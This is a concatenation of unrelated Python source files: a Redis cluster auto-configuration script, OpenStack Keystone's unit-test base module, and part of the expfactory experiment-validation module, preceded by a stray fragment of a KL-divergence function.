#print("KLD = " + str(KLD))
#print("KLDscipy = " + str(KLD_scipy))
return KLD_scipy
| |
#!/usr/bin/env python
import os
import re
import sys
import time
import subprocess
import os
import yaml
import sys, time
import operator
import random
from collections import defaultdict
from operator import itemgetter
def parse_entry(e):
return {'id': e[0], 'address':e[1], 'flags':e[2].split(','), 'slaveof':e[3],
'ping_sent':e[4], 'ping_recv':e[5], 'config_epoch':e[6], 'link_status':e[7], 'slots':e[8:]}
# str_out = '3e3a6cb0d9a9a87168e266b0a0b24026c0aae3f0 127.0.0.1:7001 master - 0 1385482984082 0 connected 5960-10921\n2938205e12de373867bf38f1ca29d31d0ddb3e46 127.0.0.1:7002 master - 0 1385482983582 0 connected\n97a3a64667477371c4479320d683e4c8db5858b1 :0 myself,master - 0 0 0 connected 0-5959 10922-11422\n'
def parse_config(str_out):
entries = [e.split() for e in str_out.split('\n') if len(e) > 0]
return map(parse_entry, entries)
class RedisClient:
def __init__(self, port):
self.port = port
self.command = "src/redis-cli"
self.token_no = 56
self.max_slot = 16384
def ping(self):
try:
out = subprocess.check_output([self.command, '-p', str(self.port), 'ping'])
return (True, out)
except subprocess.CalledProcessError as e:
print "ERR ping {0}".format(e.output)
return (False, None)
def cluster_meet(self, seed):
try:
ip, port = seed.split(':')
out = subprocess.check_output([self.command, '-p', str(self.port), 'cluster', 'meet', ip, port])
return (True, out)
except subprocess.CalledProcessError as e:
print "ERR cluster meet {0}".format(e.output)
return (False, None)
def replicate(self, master_id):
try:
out = subprocess.check_output([self.command, '-p', str(self.port), 'cluster', 'replicate', master_id])
return (True, out)
except subprocess.CalledProcessError as e:
print "ERR replicate {0}".format(e.output)
return (False, None)
def cluster_all_meet(self, seeds):
seed_ar = seeds.split(',')
print "Seeds: {0}".format(seed_ar)
results = []
for seed in seed_ar:
results.append(self.wait(self.cluster_meet, [seed]))
return results
def wait(self, command, args=()):
for t in range(0, 10):
success, out = command(*args)
if success:
return (success, out)
else:
print "Command: {0} with {1} failed, repeating {2}...".format(command, out, t)
time.sleep(3)
return (False, None)
def nodes_config(self):
try:
out = subprocess.check_output([self.command, '-p', str(self.port), 'cluster', 'nodes'])
return (True, parse_config(out))
except subprocess.CalledProcessError as e:
print "ERR nodes config {0}".format(e.output)
return (False, {})
def count_slaves(self, master_id, slaves):
return len([x for x in slaves if x['slaveof'] == master_id])
def choose_least_covered_master(self, masters, slaves):
masters_count = []
for i in range(0, len(masters)):
counter = self.count_slaves(masters[i]['id'], slaves)
masters_count.append(counter + 1)
# masters_count = [1, 1, 1, 1]
# masters_count = [1, 5, 6, 2]
# masters = [{'id':1}, {'id':2}, {'id':3}, {'id':4}]
N = sum(masters_count)
masters_universe = []
for i in range(0, len(masters)):
how_much_needed = N / masters_count[i]
for j in range(0, how_much_needed):
masters_universe.append(masters[i])
random.shuffle(masters_universe)
return random.choice(masters_universe)
# masters = [{'slaveof': '-', 'type': 'master', 'id': '74eacbf979e0c057aa7975f044e02ac3d9ea069d', 'address': '127.0.0.1:7002'}]
def add_slave(self, no_of_masters_needed, predecesors, current_config):
my_master = None
masters = []
slaves = []
for t in range(0, 300):
masters = [x for x in current_config['predecesors'] if 'master' in x['flags'] and len(x['slots']) > 0]
slaves = [x for x in current_config['predecesors'] if 'slave' in x['flags']]
if len(masters) >= no_of_masters_needed:
my_master = self.choose_least_covered_master(masters, slaves)
break
else:
success,current_config = cli.wait_for_config(predecesors)
print "Cannot choose master from {0}".format(masters)
time.sleep(3)
if my_master is None:
my_master = self.choose_least_covered_master(masters, slaves)
print "Adding slave as {0} for the guy {1}".format(current_config['myself'], my_master)
self.wait(self.replicate, [my_master['id']])
# myself = {'slaveof': '-', 'type': 'myself,master', 'id': 'b4f549ee553acd1f07eaf2a0815340c2ce6cea38', 'address': '127.0.0.1:7001'}
# no_of_masters_needed = 3
# masters = [{'slaveof': '-', 'type': 'master', 'id': '74eacbf979e0c057aa7975f044e02ac3d9ea069d', 'address': '127.0.0.1:7002'}]
def add_master(self, no_of_masters_needed, current_config):
myself = current_config['myself']
print "Adding master as {0}".format(myself)
my_id = myself['id']
my_index = myself['index']
counter_start = my_index * self.token_no
while(counter_start < self.max_slot):
self.apply_slots(my_id, counter_start, min(counter_start + self.token_no, self.max_slot))
counter_start += no_of_masters_needed * self.token_no
# range_start = 56
# range_end = 112
def apply_slots(self, my_id, range_start, range_end):
print "Applying slot {0}-{1} to id {2}".format(range_start, range_end, my_id)
for t in range(range_start, range_end):
self.apply_slot(my_id, t)
def set_slot(self, my_id, slot):
try:
cmd = [self.command, '-p', str(self.port), 'cluster', 'setslot', str(slot), 'node', my_id]
out = subprocess.check_output(cmd)
return (True, out)
except subprocess.CalledProcessError as e:
print "ERR set_slot {0}".format(e.output)
return (False, None)
def apply_slot(self, my_id, slot):
cli.wait(cli.set_slot, [my_id, slot])
# all_nodes = '10.133.5.67:9031,10.133.5.50:32900,10.133.5.37:9131,10.133.5.67:33821,10.133.5.60:9390,10.133.5.37:9362,10.133.5.68:9201,10.133.5.47:9288,10.133.5.67:9015'
# my_address = '10.133.5.67:33821'
# my_address = '10.133.5.37:9131'
# predecesors = find_my_predecesors(all_nodes, my_address)
# out = parse_config('3e3a6cb0d9a9a87168e266b0a0b24026c0aae3f0 10.133.5.67:9031 master - 0 1385482984082 0 connected 5960-10921\n2938205e12de373867bf38f1ca29d31d0ddb3e46 10.133.5.50:32900 master - 0 1385482983582 0 connected\n97a3a64667477371c4479320d683e4c8db5858b1 10.133.5.37:9131 myself,master - 0 0 0 connected 0-5959 10922-11422\n')
def wait_for_config(self, predecesors):
for t in range(0, 300):
success, out = cli.wait(cli.nodes_config)
d = defaultdict(dict)
for l in (predecesors, out):
for elem in l:
d[elem['address']].update(elem)
joined_config = d.values()
only_predecesors = [x for x in joined_config if 'index' in x]
myself = [x for x in out if 'myself' in x['flags']][0]
myself['index'] = len(predecesors)
all_predecesors_covered = reduce(operator.and_, ['id' in x and 'link_status' in x and x['link_status'] == 'connected' for x in only_predecesors], True)
if success and all_predecesors_covered:
return (success, {'predecesors': only_predecesors, 'myself': myself})
else:
print "Conditions not met {0}, {1}".format(success, only_predecesors)
time.sleep(3)
# all_nodes = '10.133.5.67:9031,10.133.5.50:32900,10.133.5.37:9131,10.133.5.67:33821,10.133.5.60:9390,10.133.5.37:9362,10.133.5.68:9201,10.133.5.47:9288,10.133.5.67:9015'
# my_address = '10.133.5.67:9031'
# my_address = '10.133.5.67:33821'
# my_address = '10.133.5.67:9015'
# my_address = '10:1'
def find_my_predecesors(all_nodes, my_address):
nds = all_nodes.split(",")
if my_address not in nds:
return []
j = nds.index(my_address)
return [{'index': i, 'address': nds[i]} for i in range(0, len(nds)) if i < j]
def should_be_master(no_of_masters_needed, current_config):
my_index = current_config['myself']['index']
print 'My index {0}'.format(my_index)
peers = current_config['predecesors']
counter = 0
for t in peers:
print 'Checking peer {0}'.format(t)
if t['index'] < my_index and 'master' in t['flags']:
counter += 1
print 'Current no of masters {0} vs needed {1}'.format(counter, no_of_masters_needed)
return counter < no_of_masters_needed
# seed_uri_conf_file = 'seed_uri_test.yml'
# redis_conf_file = 'redis-3.0.0-rc1/7001/redis.conf'
# my_port = 7001
if __name__ == "__main__":
seed_uri_conf_file = sys.argv[1]
with open(seed_uri_conf_file) as cf:
config = yaml.load(cf)
my_address = config['my_address']
my_ip, my_port = my_address.split(":")
seeds = config['seeds']
all_nodes = config['all']
print "Running cluster reconfiguration me {0}, ".format(my_address)
cli = RedisClient(my_port)
success,out = cli.wait(cli.ping)
if not success:
print "Cannot connect to Redis:{0} check your config".format(my_port)
sys.exit(1)
print "Connected: {0}:{1}".format(success, out)
no_of_masters_needed = len(seeds.split(','))
all_meetings = cli.cluster_all_meet(seeds)
all_succedded = reduce(operator.and_, [x[0] for x in all_meetings], True)
if not all_succedded:
print "Couldnt meet with some servers {0}".format(all_meetings)
sys.exit(1)
predecesors = find_my_predecesors(all_nodes, my_address)
success,current_config = cli.wait_for_config(predecesors)
print "Current seen config: {0}".format(current_config)
if (should_be_master(no_of_masters_needed, current_config)):
cli.add_master(no_of_masters_needed, current_config)
else:
cli.add_slave(no_of_masters_needed, predecesors, current_config)
print "End of configuring cluster"
| |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import atexit
import functools
import logging
import os
import re
import shutil
import socket
import sys
import warnings
import fixtures
from oslo_config import cfg
from oslo_config import fixture as config_fixture
from oslo_log import log
import oslotest.base as oslotest
from oslotest import mockpatch
import six
from sqlalchemy import exc
from testtools import testcase
import webob
# NOTE(ayoung)
# environment.use_eventlet must run before any of the code that will
# call the eventlet monkeypatching.
from keystone.common import environment # noqa
environment.use_eventlet()
from keystone import auth
from keystone.common import config as common_cfg
from keystone.common import dependency
from keystone.common import kvs
from keystone.common.kvs import core as kvs_core
from keystone.common import sql
from keystone import config
from keystone import controllers
from keystone import exception
from keystone import notifications
from keystone.policy.backends import rules
from keystone.server import common
from keystone import service
from keystone.tests.unit import ksfixtures
config.configure()
LOG = log.getLogger(__name__)
PID = six.text_type(os.getpid())
TESTSDIR = os.path.dirname(os.path.abspath(__file__))
TESTCONF = os.path.join(TESTSDIR, 'config_files')
ROOTDIR = os.path.normpath(os.path.join(TESTSDIR, '..', '..', '..'))
VENDOR = os.path.join(ROOTDIR, 'vendor')
ETCDIR = os.path.join(ROOTDIR, 'etc')
def _calc_tmpdir():
env_val = os.environ.get('KEYSTONE_TEST_TEMP_DIR')
if not env_val:
return os.path.join(TESTSDIR, 'tmp', PID)
return os.path.join(env_val, PID)
TMPDIR = _calc_tmpdir()
CONF = cfg.CONF
log.register_options(CONF)
rules.init()
IN_MEM_DB_CONN_STRING = 'sqlite://'
exception._FATAL_EXCEPTION_FORMAT_ERRORS = True
os.makedirs(TMPDIR)
atexit.register(shutil.rmtree, TMPDIR)
class dirs(object):
@staticmethod
def root(*p):
return os.path.join(ROOTDIR, *p)
@staticmethod
def etc(*p):
return os.path.join(ETCDIR, *p)
@staticmethod
def tests(*p):
return os.path.join(TESTSDIR, *p)
@staticmethod
def tmp(*p):
return os.path.join(TMPDIR, *p)
@staticmethod
def tests_conf(*p):
return os.path.join(TESTCONF, *p)
# keystone.common.sql.initialize() for testing.
DEFAULT_TEST_DB_FILE = dirs.tmp('test.db')
@atexit.register
def remove_test_databases():
db = dirs.tmp('test.db')
if os.path.exists(db):
os.unlink(db)
pristine = dirs.tmp('test.db.pristine')
if os.path.exists(pristine):
os.unlink(pristine)
def generate_paste_config(extension_name):
# Generate a file, based on keystone-paste.ini, that is named:
# extension_name.ini, and includes extension_name in the pipeline
with open(dirs.etc('keystone-paste.ini'), 'r') as f:
contents = f.read()
new_contents = contents.replace(' service_v3',
' %s service_v3' % (extension_name))
new_paste_file = dirs.tmp(extension_name + '.ini')
with open(new_paste_file, 'w') as f:
f.write(new_contents)
return new_paste_file
def remove_generated_paste_config(extension_name):
# Remove the generated paste config file, named extension_name.ini
paste_file_to_remove = dirs.tmp(extension_name + '.ini')
os.remove(paste_file_to_remove)
def skip_if_cache_disabled(*sections):
"""This decorator is used to skip a test if caching is disabled either
globally or for the specific section.
In the code fragment::
@skip_if_cache_is_disabled('assignment', 'token')
def test_method(*args):
...
The method test_method would be skipped if caching is disabled globally via
the `enabled` option in the `cache` section of the configuration or if
the `caching` option is set to false in either `assignment` or `token`
sections of the configuration. This decorator can be used with no
arguments to only check global caching.
If a specified configuration section does not define the `caching` option,
this decorator makes the same assumption as the `should_cache_fn` in
keystone.common.cache that caching should be enabled.
"""
def wrapper(f):
@functools.wraps(f)
def inner(*args, **kwargs):
if not CONF.cache.enabled:
raise testcase.TestSkipped('Cache globally disabled.')
for s in sections:
conf_sec = getattr(CONF, s, None)
if conf_sec is not None:
if not getattr(conf_sec, 'caching', True):
raise testcase.TestSkipped('%s caching disabled.' % s)
return f(*args, **kwargs)
return inner
return wrapper
def skip_if_no_multiple_domains_support(f):
"""This decorator is used to skip a test if an identity driver
does not support multiple domains.
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
test_obj = args[0]
if not test_obj.identity_api.multiple_domains_supported:
raise testcase.TestSkipped('No multiple domains support')
return f(*args, **kwargs)
return wrapper
class UnexpectedExit(Exception):
pass
class BadLog(Exception):
"""Raised on invalid call to logging (parameter mismatch)."""
pass
class TestClient(object):
def __init__(self, app=None, token=None):
self.app = app
self.token = token
def request(self, method, path, headers=None, body=None):
if headers is None:
headers = {}
if self.token:
headers.setdefault('X-Auth-Token', self.token)
req = webob.Request.blank(path)
req.method = method
for k, v in six.iteritems(headers):
req.headers[k] = v
if body:
req.body = body
return req.get_response(self.app)
def get(self, path, headers=None):
return self.request('GET', path=path, headers=headers)
def post(self, path, headers=None, body=None):
return self.request('POST', path=path, headers=headers, body=body)
def put(self, path, headers=None, body=None):
return self.request('PUT', path=path, headers=headers, body=body)
class BaseTestCase(oslotest.BaseTestCase):
"""Light weight base test class.
This is a placeholder that will eventually go away once the
setup/teardown in TestCase is properly trimmed down to the bare
essentials. This is really just a play to speed up the tests by
eliminating unnecessary work.
"""
def setUp(self):
super(BaseTestCase, self).setUp()
self.useFixture(mockpatch.PatchObject(sys, 'exit',
side_effect=UnexpectedExit))
self.useFixture(mockpatch.PatchObject(logging.Handler, 'handleError',
side_effect=BadLog))
warnings.filterwarnings('error', category=DeprecationWarning,
module='^keystone\\.')
warnings.simplefilter('error', exc.SAWarning)
self.addCleanup(warnings.resetwarnings)
def cleanup_instance(self, *names):
"""Create a function suitable for use with self.addCleanup.
:returns: a callable that uses a closure to delete instance attributes
"""
def cleanup():
for name in names:
# TODO(dstanek): remove this 'if' statement once
# load_backend in test_backend_ldap is only called once
# per test
if hasattr(self, name):
delattr(self, name)
return cleanup
class TestCase(BaseTestCase):
def config_files(self):
return []
def config_overrides(self):
signing_certfile = 'examples/pki/certs/signing_cert.pem'
signing_keyfile = 'examples/pki/private/signing_key.pem'
self.config_fixture.config(group='oslo_policy',
policy_file=dirs.etc('policy.json'))
self.config_fixture.config(
# TODO(morganfainberg): Make Cache Testing a separate test case
# in tempest, and move it out of the base unit tests.
group='cache',
backend='dogpile.cache.memory',
enabled=True,
proxies=['keystone.tests.unit.test_cache.CacheIsolatingProxy'])
self.config_fixture.config(
group='catalog',
driver='templated',
template_file=dirs.tests('default_catalog.templates'))
self.config_fixture.config(
group='kvs',
backends=[
('keystone.tests.unit.test_kvs.'
'KVSBackendForcedKeyMangleFixture'),
'keystone.tests.unit.test_kvs.KVSBackendFixture'])
self.config_fixture.config(group='revoke', driver='kvs')
self.config_fixture.config(
group='signing', certfile=signing_certfile,
keyfile=signing_keyfile,
ca_certs='examples/pki/certs/cacert.pem')
self.config_fixture.config(group='token', driver='kvs')
self.config_fixture.config(
group='saml', certfile=signing_certfile, keyfile=signing_keyfile)
self.config_fixture.config(
default_log_levels=[
'amqp=WARN',
'amqplib=WARN',
'boto=WARN',
'qpid=WARN',
'sqlalchemy=WARN',
'suds=INFO',
'oslo.messaging=INFO',
'iso8601=WARN',
'requests.packages.urllib3.connectionpool=WARN',
'routes.middleware=INFO',
'stevedore.extension=INFO',
'keystone.notifications=INFO',
'keystone.common._memcache_pool=INFO',
'keystone.common.ldap=INFO',
])
self.auth_plugin_config_override()
def auth_plugin_config_override(self, methods=None, **method_classes):
if methods is not None:
self.config_fixture.config(group='auth', methods=methods)
common_cfg.setup_authentication()
if method_classes:
self.config_fixture.config(group='auth', **method_classes)
def setUp(self):
super(TestCase, self).setUp()
self.addCleanup(CONF.reset)
self.config_fixture = self.useFixture(config_fixture.Config(CONF))
self.addCleanup(delattr, self, 'config_fixture')
self.config(self.config_files())
# NOTE(morganfainberg): mock the auth plugin setup to use the config
# fixture which automatically unregisters options when performing
# cleanup.
def mocked_register_auth_plugin_opt(conf, opt):
self.config_fixture.register_opt(opt, group='auth')
self.useFixture(mockpatch.PatchObject(
common_cfg, '_register_auth_plugin_opt',
new=mocked_register_auth_plugin_opt))
self.config_overrides()
self.useFixture(fixtures.FakeLogger(level=logging.DEBUG))
# NOTE(morganfainberg): This code is a copy from the oslo-incubator
# log module. This is not in a function or otherwise available to use
# without having a CONF object to setup logging. This should help to
# reduce the log size by limiting what we log (similar to how Keystone
# would run under mod_wsgi or eventlet).
for pair in CONF.default_log_levels:
mod, _sep, level_name = pair.partition('=')
logger = logging.getLogger(mod)
logger.setLevel(level_name)
self.useFixture(ksfixtures.Cache())
# Clear the registry of providers so that providers from previous
# tests aren't used.
self.addCleanup(dependency.reset)
self.addCleanup(kvs.INMEMDB.clear)
# Ensure Notification subscriptions and resource types are empty
self.addCleanup(notifications.clear_subscribers)
self.addCleanup(notifications.reset_notifier)
# Reset the auth-plugin registry
self.addCleanup(self.clear_auth_plugin_registry)
self.addCleanup(setattr, controllers, '_VERSIONS', [])
def config(self, config_files):
sql.initialize()
CONF(args=[], project='keystone', default_config_files=config_files)
def load_backends(self):
"""Initializes each manager and assigns them to an attribute."""
# TODO(blk-u): Shouldn't need to clear the registry here, but some
# tests call load_backends multiple times. These should be fixed to
# only call load_backends once.
dependency.reset()
# TODO(morganfainberg): Shouldn't need to clear the registry here, but
# some tests call load_backends multiple times. Since it is not
# possible to re-configure a backend, we need to clear the list. This
# should eventually be removed once testing has been cleaned up.
kvs_core.KEY_VALUE_STORE_REGISTRY.clear()
self.clear_auth_plugin_registry()
drivers, _unused = common.setup_backends(
load_extra_backends_fn=self.load_extra_backends)
for manager_name, manager in six.iteritems(drivers):
setattr(self, manager_name, manager)
self.addCleanup(self.cleanup_instance(*list(drivers.keys())))
def load_extra_backends(self):
"""Override to load managers that aren't loaded by default.
This is useful to load managers initialized by extensions. No extra
backends are loaded by default.
:return: dict of name -> manager
"""
return {}
def load_fixtures(self, fixtures):
"""Hacky basic and naive fixture loading based on a python module.
Expects that the various APIs into the various services are already
defined on `self`.
"""
# NOTE(dstanek): create a list of attribute names to be removed
# from this instance during cleanup
fixtures_to_cleanup = []
# TODO(termie): doing something from json, probably based on Django's
# loaddata will be much preferred.
if (hasattr(self, 'identity_api') and
hasattr(self, 'assignment_api') and
hasattr(self, 'resource_api')):
for domain in fixtures.DOMAINS:
try:
rv = self.resource_api.create_domain(domain['id'], domain)
except exception.Conflict:
rv = self.resource_api.get_domain(domain['id'])
except exception.NotImplemented:
rv = domain
attrname = 'domain_%s' % domain['id']
setattr(self, attrname, rv)
fixtures_to_cleanup.append(attrname)
for tenant in fixtures.TENANTS:
if hasattr(self, 'tenant_%s' % tenant['id']):
try:
# This will clear out any roles on the project as well
self.resource_api.delete_project(tenant['id'])
except exception.ProjectNotFound:
pass
rv = self.resource_api.create_project(
tenant['id'], tenant)
attrname = 'tenant_%s' % tenant['id']
setattr(self, attrname, rv)
fixtures_to_cleanup.append(attrname)
for role in fixtures.ROLES:
try:
rv = self.role_api.create_role(role['id'], role)
except exception.Conflict:
rv = self.role_api.get_role(role['id'])
attrname = 'role_%s' % role['id']
setattr(self, attrname, rv)
fixtures_to_cleanup.append(attrname)
for user in fixtures.USERS:
user_copy = user.copy()
tenants = user_copy.pop('tenants')
try:
existing_user = getattr(self, 'user_%s' % user['id'], None)
if existing_user is not None:
self.identity_api.delete_user(existing_user['id'])
except exception.UserNotFound:
pass
# For users, the manager layer will generate the ID
user_copy = self.identity_api.create_user(user_copy)
# Our tests expect that the password is still in the user
# record so that they can reference it, so put it back into
# the dict returned.
user_copy['password'] = user['password']
for tenant_id in tenants:
try:
self.assignment_api.add_user_to_project(
tenant_id, user_copy['id'])
except exception.Conflict:
pass
# Use the ID from the fixture as the attribute name, so
# that our tests can easily reference each user dict, while
# the ID in the dict will be the real public ID.
attrname = 'user_%s' % user['id']
setattr(self, attrname, user_copy)
fixtures_to_cleanup.append(attrname)
self.addCleanup(self.cleanup_instance(*fixtures_to_cleanup))
def _paste_config(self, config):
if not config.startswith('config:'):
test_path = os.path.join(TESTSDIR, config)
etc_path = os.path.join(ROOTDIR, 'etc', config)
for path in [test_path, etc_path]:
if os.path.exists('%s-paste.ini' % path):
return 'config:%s-paste.ini' % path
return config
def loadapp(self, config, name='main'):
return service.loadapp(self._paste_config(config), name=name)
def clear_auth_plugin_registry(self):
auth.controllers.AUTH_METHODS.clear()
auth.controllers.AUTH_PLUGINS_LOADED = False
def assertCloseEnoughForGovernmentWork(self, a, b, delta=3):
"""Asserts that two datetimes are nearly equal within a small delta.
:param delta: Maximum allowable time delta, defined in seconds.
"""
msg = '%s != %s within %s delta' % (a, b, delta)
self.assertTrue(abs(a - b).seconds <= delta, msg)
def assertNotEmpty(self, l):
self.assertTrue(len(l))
def assertRaisesRegexp(self, expected_exception, expected_regexp,
callable_obj, *args, **kwargs):
"""Asserts that the message in a raised exception matches a regexp.
"""
try:
callable_obj(*args, **kwargs)
except expected_exception as exc_value:
if isinstance(expected_regexp, six.string_types):
expected_regexp = re.compile(expected_regexp)
if isinstance(exc_value.args[0], unicode):
if not expected_regexp.search(unicode(exc_value)):
raise self.failureException(
'"%s" does not match "%s"' %
(expected_regexp.pattern, unicode(exc_value)))
else:
if not expected_regexp.search(str(exc_value)):
raise self.failureException(
'"%s" does not match "%s"' %
(expected_regexp.pattern, str(exc_value)))
else:
if hasattr(expected_exception, '__name__'):
excName = expected_exception.__name__
else:
excName = str(expected_exception)
raise self.failureException("%s not raised" % excName)
@property
def ipv6_enabled(self):
if socket.has_ipv6:
sock = None
try:
sock = socket.socket(socket.AF_INET6)
# NOTE(Mouad): Try to bind to IPv6 loopback ip address.
sock.bind(("::1", 0))
return True
except socket.error:
pass
finally:
if sock:
sock.close()
return False
def skip_if_no_ipv6(self):
if not self.ipv6_enabled:
raise self.skipTest("IPv6 is not enabled in the system")
def skip_if_env_not_set(self, env_var):
if not os.environ.get(env_var):
self.skipTest('Env variable %s is not set.' % env_var)
class SQLDriverOverrides(object):
"""A mixin for consolidating sql-specific test overrides."""
def config_overrides(self):
super(SQLDriverOverrides, self).config_overrides()
# SQL specific driver overrides
self.config_fixture.config(group='catalog', driver='sql')
self.config_fixture.config(group='identity', driver='sql')
self.config_fixture.config(group='policy', driver='sql')
self.config_fixture.config(group='revoke', driver='sql')
self.config_fixture.config(group='token', driver='sql')
self.config_fixture.config(group='trust', driver='sql')
| |
'''
experiment.py: part of expfactory package
Functions to work with javascript experiments
'''
from expfactory.utils import find_directories, remove_unicode_dict
from glob import glob
import filecmp
import numpy
import json
import re
import os
def get_validation_fields():
'''get_validation_fields
Returns a list of tuples (each a field)
..note::
specifies fields required for a valid json
(field,value,type)
field: the field name
value: indicates minimum required entires
0: not required, no warning
1: required, not valid
2: not required, warning
type: indicates the variable type
'''
return [("run",1,list),
("name",2,str),
("contributors",0,str),
("time",1,int),
("notes",0,str),
("reference",2,str),
("exp_id",1,str),
("cognitive_atlas_task_id",2,str),
("experiment_variables",0,list),
("publish",1,str),
("deployment_variables",0,str),
("template",1,str)]
def notvalid(reason):
print reason
return False
def dowarning(reason):
print reason
def get_valid_templates():
return ['jspsych','survey','phaser','custom']
def get_acceptable_values(package_name):
acceptable_values = dict()
acceptable_values["jspsych"] =["display_element",
"on_finish",
"on_trial_start",
"on_trial_finish",
"on_data_update",
"show_progress_bar",
"max_load_time",
"skip_load_check",
"fullscreen",
"default_iti"]
acceptable_values["survey"] = ["fullscreen"]
return acceptable_values[package_name]
def validate(experiment_folder=None,warning=True):
'''validate
:param experiment_folder: full path to experiment folder with config.json
:param warning: issue a warning for empty fields with level 2 (warning)
..note::
takes an experiment folder, and looks for validation based on:
- config.json
- files existing specified in config.json
All fields should be defined, but for now we just care about run scripts
'''
if experiment_folder==None:
experiment_folder=os.path.abspath(os.getcwd())
try:
meta = load_experiment(experiment_folder)
if meta == False:
return notvalid("%s is not an experiment." %(experiment_folder))
experiment_name = os.path.basename(experiment_folder)
except:
return notvalid("%s: config.json is not loadable." %(experiment_folder))
if len(meta)>1:
return notvalid("%s: config.json has length > 1, not valid." %(experiment_folder))
fields = get_validation_fields()
valid_templates = get_valid_templates()
for field,value,ftype in fields:
# Field must be in the keys if required
if field not in meta[0].keys() and value == 1:
return notvalid("%s: config.json is missing required field %s" %(experiment_name,field))
else:
if value == 2:
if warning == True:
dowarning("WARNING: config.json is missing field %s: %s" %(field,experiment_name))
if field == "exp_id":
# Tag must correspond with folder name
if meta[0][field] != experiment_name:
return notvalid("%s: exp_id parameter %s does not match folder name." %(experiment_name,meta[0][field]))
# name cannot have special characters, only _ and letters/numbers
if not re.match("^[a-z0-9_]*$", meta[0][field]):
return notvalid("%s: exp_id parameter %s has invalid characters, only lowercase [a-z],[0-9], and _ allowed." %(experiment_name,meta[0][field]))
# Check if experiment is production ready
if field == "publish":
if meta[0][field] == "False":
return notvalid("%s: config.json specifies not production ready." %experiment_name)
# Run must be a list of strings
if field == "run":
# Is it a list?
if not isinstance(meta[0][field],ftype):
return notvalid("%s: field %s must be %s" %(experiment_name,field,ftype))
# Is an experiment.js defined
# Is each script in the list a string?
for script in meta[0][field]:
# If we have a single file, is it in the experiment folder?
if len(script.split("/")) == 1:
if not os.path.exists("%s/%s" %(experiment_folder,script)):
return notvalid("%s: %s is specified in config.json but missing." %(experiment_name,script))
# Do we have an external script? It must be https
if re.search("http",script) and not re.search("https",script):
return notvalid("%s: external script %s must be https." %(experiment_name,script))
# Below is for required parameters
if value == 1:
if meta[0][field] == "":
return notvalid("%s: config.json must be defined for field %s" %(experiment_name,field))
# Field value must have minimum of value entries
if not isinstance(meta[0][field],list):
tocheck = [meta[0][field]]
else:
tocheck = meta[0][field]
if len(tocheck) < value:
return notvalid("%s: config.json must have >= %s for field %s" %(experiment_name,value,field))
# Below is for warning parameters
elif value == 2:
if meta[0][field] == "":
if warning == True:
dowarning("WARNING: config.json is missing value for field %s: %s" %(field,experiment_name))
# Check the experiment template, currently valid are jspsych and survey
if field == "template":
if meta[0][field] not in valid_templates:
return notvalid("%s: we currently only support %s experiments." %(experiment_name,",".join(valid_templates)))
# Jspsych javascript experiment
if meta[0][field] == "jspsych":
if "run" in meta[0]:
if "experiment.js" not in meta[0]["run"]:
return notvalid("%s: experiment.js is not defined in run" %(experiment_name))
else:
return notvalid("%s: config.json is missing required field run" %(experiment_name))
# Material Design light survey
elif meta[0][field] == "survey":
if not os.path.exists("%s/survey.tsv" %(experiment_folder)):
return notvalid("%s: required survey.tsv for template survey not found." %(experiment_name))
# Phaser game
elif meta[0][field] == "phaser":
if not os.path.exists("%s/Run.js" %(experiment_folder)):
return notvalid("%s: required Run.js main game file not found." %(experiment_name))
if "run" not in meta[0]["deployment_variables"]:
return notvalid("%s: 'run' (code) is required in deployment_variables" %(experiment_name))
# Validation for deployment_variables
if field == "deployment_variables":
if "deployment_variables" in meta[0]:
if "jspsych_init" in meta[0][field]:
check_acceptable_variables(experiment_name,meta[0][field],"jspsych","jspsych_init")
elif "survey" in meta[0][field]:
check_acceptable_variables(experiment_name,meta[0][field],"survey","material_design")
return True
def check_acceptable_variables(experiment_name,field_dict,template,field_dict_key):
'''check_acceptable_variables takes a field (eg, meta[0][field]) that has a dictionary, and some template key (eg, jspsych) and makes sure the keys of the dictionary are within the allowable for the template type (the key).
:param experiment_name: the name of the experiment
:param field_dict: the field value from the config.json, a dictionary
:param field_dict_key: a key to look up in the field_dict, which should contain a dictionary of {"key":"value"} variables
:param template: the key name, for looking up acceptable values using get_acceptable_values
'''
acceptable_values = get_acceptable_values(template)
for acceptable_var,acceptable_val in field_dict[field_dict_key].iteritems():
if acceptable_var not in acceptable_values:
return notvalid("%s: %s is not an acceptable value for %s." %(experiment_name,acceptable_var,field_dict_key))
# Jspsych specific validation
if template == "jspsych":
# Variables that must be boolean
if acceptable_var in ["show_progress_bar","fullscreen","skip_load_check"]:
check_boolean(experiment_name,acceptable_val,acceptable_var)
# Variables that must be numeric
if acceptable_var in ["default_iti","max_load_time"]:
if isinstance(acceptable_val,str) or isinstance(acceptable_val,bool):
return notvalid("%s: %s is not an acceptable value for %s in %s. Must be numeric." %(experiment_name,acceptable_val,acceptable_var,field_dict_key))
elif template == "survey":
# Variables that must be boolean
if acceptable_var in ["show_progress_bar","fullscreen","skip_load_check"]:
check_boolean(experiment_name,acceptable_val,acceptable_var)
def check_boolean(experiment_name,value,variable_name):
'''check_boolean checks if a value is boolean
:param experiment_name: the name of the experiment
:param value: the value to check
:param variable_name: the name of the variable (the key being indexed in the dictionary)
'''
if value not in [True,False]:
return notvalid("%s: %s is not an acceptable value for %s. Must be true/false." %(experiment_name,value,varialbe_name))
def get_experiments(experiment_repo,load=False,warning=True,repo_type="experiments"):
'''get_experiments
return loaded json for all valid experiments from an experiment folder
:param experiment_repo: full path to the experiments repo
:param load: if True, returns a list of loaded config.json objects. If False (default) returns the paths to the experiments
:param repo_type: tells the user what kind of task is being parsed, default is "experiments," but can also be "surveys" when called by get_surveys
'''
experiments = find_directories(experiment_repo)
valid_experiments = [e for e in experiments if validate(e,warning)]
print "Found %s valid %s" %(len(valid_experiments),repo_type)
if load == True:
valid_experiments = load_experiments(valid_experiments)
return valid_experiments
def load_experiments(experiment_folders):
'''load_experiments
a wrapper for load_experiment to read multiple experiments
:param experiment_folders: a list of experiment folders to load, full paths
'''
experiments = []
if isinstance(experiment_folders,str):
experiment_folders = [experiment_folders]
for experiment_folder in experiment_folders:
exp = load_experiment(experiment_folder)
experiments.append(exp)
return experiments
